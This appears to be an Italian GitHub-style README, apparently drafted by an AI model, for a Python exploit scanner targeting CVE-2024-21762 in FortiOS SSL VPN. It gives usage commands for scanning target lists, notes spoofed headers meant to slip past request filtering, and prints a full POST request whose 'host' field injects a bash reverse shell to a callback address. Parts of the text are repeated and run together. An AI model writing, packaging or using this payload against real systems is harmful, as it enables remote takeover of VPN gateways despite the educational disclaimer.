
Scanner proof-of-concept mirato a CVE-2024-21762 nell'endpoint /remote/hostcheck_validate di FortiOS SSL VPN con consegna di payload reverse shell.
Scanner proof-of-concept che ha come target CVE-2024-21762 nell'endpoint /remote/hostcheck_validate di FortiOS SSL VPN con invio di payload reverse shell.
Ecco un writeup in stile GitHub per il tuo progetto, che include un riepilogo chiaro e conciso, una guida all'uso e il contesto su come si inserisce nella CVE.
CVE-2024-21762 FortiOS HostCheck PoC ScannerScanner proof-of-concept che ha come target CVE-2024-21762 nell'endpoint
/remote/hostcheck_validatedi FortiOS SSL VPN con invio di payload reverse shell.
Questo script Python è uno strumento PoC (Proof of Concept) progettato per interagire con l'interfaccia SSL VPN di Fortinet FortiOS, mirando a CVE-2024-21762 — una vulnerabilità di buffer overflow basato su stack o command injection nell'endpoint /remote/hostcheck_validate.
Disclaimer: Questo è solo per scopi educativi e di test autorizzati.
/remote/hostcheck_validate su un'interfaccia SSL VPN FortiGate.host).User-Agent, Cookie) per bypassare il filtraggio superficiale delle richieste FortiOS.last_response.txt)tqdm per la visualizzazione del progressoInstalla le dipendenze:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: Elenco di target in formato IP:PORT, uno per rigaresults.txt: Log di output dei tentativi di exploitPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
Lo strumento scrive la risposta HTTP completa di ogni tentativo in:
last_response.txt
Usalo per verificare se la richiesta è stata analizzata, rifiutata o se è stato restituito un codice di errore.
Questo codice è fornito solo per scopi educativi e di test autorizzati. Non utilizzarlo su reti o sistemi di cui non possiedi o non hai il permesso esplicito di testare.
Carter — Ingegnere della Sicurezza Informatica, appassionato di Red/Purple Team, nerd dell'automazione PoC.
Vuoi che questo venga impacchettato in un file README.md + struttura del repo pronti per essere inviati su GitHub? Posso generarlo dopo.